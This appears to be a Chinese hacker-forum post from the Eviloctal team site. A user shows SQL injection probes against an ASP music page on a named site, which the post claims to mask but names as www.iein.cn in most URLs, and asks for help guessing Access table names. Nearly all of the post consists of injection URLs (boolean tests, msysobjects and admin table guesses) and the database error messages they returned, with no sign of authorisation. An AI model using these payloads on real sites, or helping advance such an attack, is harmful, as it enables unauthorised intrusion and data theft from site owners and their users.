议题提交:Yaqilles
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
access数据库在注入时表名为空的现象我遇到了好多次了!
下面是我多一个站的注入出现的次现象
http://www.xxxxx.cn/music/Singer1.Asp?id=1522'(为保护网站所以用星号表示)
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'NclassID=1522' order by hits desc' 中。
/music/Singer1.Asp,行83
这 我都看了是正确的。
http://www.xxxxx.cn/music/Singer1.Asp?id=1522%20and%201=1
正常返回
http://www.iein.cn/music/Singer1.Asp?id=1522%20and%201=2
和前一页不同
http://www.iein.cn/music/Singer1.Asp?id=1522%20;
在这我还实验了“;”返回
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。
/music/Singer1.Asp,行83
http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20user>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e10'
[Microsoft][ODBC Microsoft Access Driver] 参数不足,期待是 1。
/music/Singer1.Asp,行83
http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20(select%20count(*)from%20msysobjects)>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。
/music/Singer1.Asp,行83
返回的还是
http://www.iein.cn/music/Singer1.Asp?id=1522;and (select count(*)from sysobjects)>0
返回
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。
/music/Singer1.Asp,行83
到这都知道是 ACCESS数据库了!可是在猜他表名的时候就有问题了!
http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20(select%20count(*)from%20admin)>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。
/music/Singer1.Asp,行83
这是返回。就这样我把我能想到的想到的都猜过了!
想是可能是我自己经验的问题所以我用了好多的工具都是显示表名为空。
我想来不可能!数据库表空了??不合理!!
所以在这希望各位高手解答!